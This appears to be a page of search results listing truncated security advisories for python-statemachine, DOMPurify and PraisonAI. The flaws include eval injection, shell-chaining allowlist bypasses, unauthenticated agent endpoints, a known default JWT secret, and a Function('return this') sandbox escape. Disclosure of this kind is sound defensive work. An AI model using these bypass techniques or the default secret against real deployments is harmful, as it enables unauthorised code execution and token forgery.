728661 matches found
python-statemachine SCXML <data expr> Eval Injection
Summary python-statemachine 3.1.2 evaluates attributes in SCXML documents using Python's eval. Any application that passes attacker-controlled SCXML content to SCXMLProcessor is vulnerable to arbitrary code execution in the context of the hosting process. Details SCXMLProcessor.parsescxmlfile...
DOMPurify: Permanent `ALLOWED_ATTR` pollution via `setConfig()` bypassing the hook clone-guard (incomplete fix of the 3.4.7 hook-pollution patch)
Summary DOMPurify 3.4.7 shipped a security fix "permanent hook pollution" that makes a registered uponSanitizeAttribute hook's mutation of data.allowedAttributes non-persistent — so allowing an attribute for one element does not leak into later sanitize calls. The fix clones ALLOWEDATTR inside...
GHSA-CMWH-PVXP-8882 DOMPurify: Permanent `ALLOWED_ATTR` pollution via `setConfig()` bypassing the hook clone-guard (incomplete fix of the 3.4.7 hook-pollution patch)
Summary DOMPurify 3.4.7 shipped a security fix "permanent hook pollution" that makes a registered uponSanitizeAttribute hook's mutation of data.allowedAttributes non-persistent — so allowing an attribute for one element does not leak into later sanitize calls. The fix clones ALLOWEDATTR inside...
GHSA-CWJ8-7GP2-GGCW praisonai-platform: default JWT signing secret 'dev-secret-change-me' enables token forgery
praisonai-platform: default JWT signing secret dev-secret-change-me Researcher: Kai Aizen — SnailSploit @SnailSploit, Adversarial & Offensive Security Research Target: https://github.com/MervinPraison/PraisonAI --- Package: praisonai-platform on PyPI Latest version and version tested: 0.1.4,...
praisonai-platform: default JWT signing secret 'dev-secret-change-me' enables token forgery
praisonai-platform: default JWT signing secret dev-secret-change-me Researcher: Kai Aizen — SnailSploit @SnailSploit, Adversarial & Offensive Security Research Target: https://github.com/MervinPraison/PraisonAI --- Package: praisonai-platform on PyPI Latest version and version tested: 0.1.4,...
PraisonAI SandlockSandbox falls back to unrestricted subprocess execution when Landlock is unavailable
Summary praisonai.sandbox.SandlockSandbox is documented and implemented as the kernel-enforced sandbox backend for untrusted code. Its SandboxConfig.native path lets callers configure allowed filesystem paths and network=False. On systems where the optional sandlock module imports but reports tha...
GHSA-6JCQ-6546-QRRW PraisonAI SandlockSandbox falls back to unrestricted subprocess execution when Landlock is unavailable
Summary praisonai.sandbox.SandlockSandbox is documented and implemented as the kernel-enforced sandbox backend for untrusted code. Its SandboxConfig.native path lets callers configure allowed filesystem paths and network=False. On systems where the optional sandlock module imports but reports tha...
npm PraisonAI utility shell safe-command wrapper allowlist bypass via shell chaining
Summary The published npm package praisonai ships dist/tools/utility-tools.js, which exports a shellcommand helper described in source as: text Execute shell command safe version - read-only commands The helper attempts to enforce a safe read-only command allowlist by checking only the first...
GHSA-5JV7-2MJM-H6QJ npm PraisonAI utility shell safe-command wrapper allowlist bypass via shell chaining
Summary The published npm package praisonai ships dist/tools/utility-tools.js, which exports a shellcommand helper described in source as: text Execute shell command safe version - read-only commands The helper attempts to enforce a safe read-only command allowlist by checking only the first...
npm PraisonAI MCPServer exposes unauthenticated HTTP tools/call
Summary The published npm package praisonai exports a TypeScript MCPServer that can expose tools, resources, and prompts over an HTTP JSON-RPC transport with: ts await server.start port: 3000 ; The HTTP transport has no authentication or authorization path. MCPServerConfig does not expose an...
GHSA-J4F3-55X4-R6Q2 npm PraisonAI MCPServer exposes unauthenticated HTTP tools/call
Summary The published npm package praisonai exports a TypeScript MCPServer that can expose tools, resources, and prompts over an HTTP JSON-RPC transport with: ts await server.start port: 3000 ; The HTTP transport has no authentication or authorization path. MCPServerConfig does not expose an...
npm PraisonAI AgentOS exposes unauthenticated agent listing and invocation
Summary The published npm package praisonai ships a TypeScript AgentOS HTTP server that defaults to host: "0.0.0.0" and registers sensitive agent routes without any authentication or authorization middleware. When a developer starts AgentOS, a network attacker who can reach the service can: - rea...
GHSA-9752-MHQH-H34F npm PraisonAI AgentOS exposes unauthenticated agent listing and invocation
Summary The published npm package praisonai ships a TypeScript AgentOS HTTP server that defaults to host: "0.0.0.0" and registers sensitive agent routes without any authentication or authorization middleware. When a developer starts AgentOS, a network attacker who can reach the service can: - rea...
PraisonAI: Remote Code Execution via Sandbox Escape in `codeMode` Tool
Summary The codeMode tool in src/praisonai-ts/src/tools/builtins/code-mode.ts uses new Function with a withsandbox pattern to execute LLM-generated code. The blocklist-based "sandbox" can be trivially bypassed via Function'return this' to recover the global object, followed by global.require with...
GHSA-P69M-4F92-2V84 PraisonAI: Remote Code Execution via Sandbox Escape in `codeMode` Tool
Summary The codeMode tool in src/praisonai-ts/src/tools/builtins/code-mode.ts uses new Function with a withsandbox pattern to execute LLM-generated code. The blocklist-based "sandbox" can be trivially bypassed via Function'return this' to recover the global object, followed by global.require with...
npm PraisonAI SandboxExecutor allowedCommands bypass via shell chaining
Summary The published npm package praisonai exports SandboxExecutor, CommandValidator, and sandboxExec as "safe command execution with restrictions." When allowedCommands is configured, CommandValidator checks only the first whitespace-delimited token of the command string. SandboxExecutor then...
GHSA-VJV9-7M7J-H833 npm PraisonAI SandboxExecutor allowedCommands bypass via shell chaining
Summary The published npm package praisonai exports SandboxExecutor, CommandValidator, and sandboxExec as "safe command execution with restrictions." When allowedCommands is configured, CommandValidator checks only the first whitespace-delimited token of the command string. SandboxExecutor then...
GHSA-VMMJ-PFW7-FJWP npm PraisonAI codeMode sandbox escape via Function constructor
Summary The published npm package praisonai exports a TypeScript built-in tool named codeMode. The package describes this tool as executing code in a sandboxed environment, marks its capability as sandbox: true, and registers it through the public tools facade. The implementation does not create ...
npm PraisonAI codeMode sandbox escape via Function constructor
Summary The published npm package praisonai exports a TypeScript built-in tool named codeMode. The package describes this tool as executing code in a sandboxed environment, marks its capability as sandbox: true, and registers it through the public tools facade. The implementation does not create ...
npm PraisonAI MCPSecurity Basic/OAuth authentication policies accept invalid credentials without validation
Summary The published npm package praisonai exports an MCPSecurity helper described in source as: text MCP Security - Authentication, authorization, and rate limiting Provides security policies for MCP servers. Its AuthMethod type advertises five authentication methods: ts export type AuthMethod ...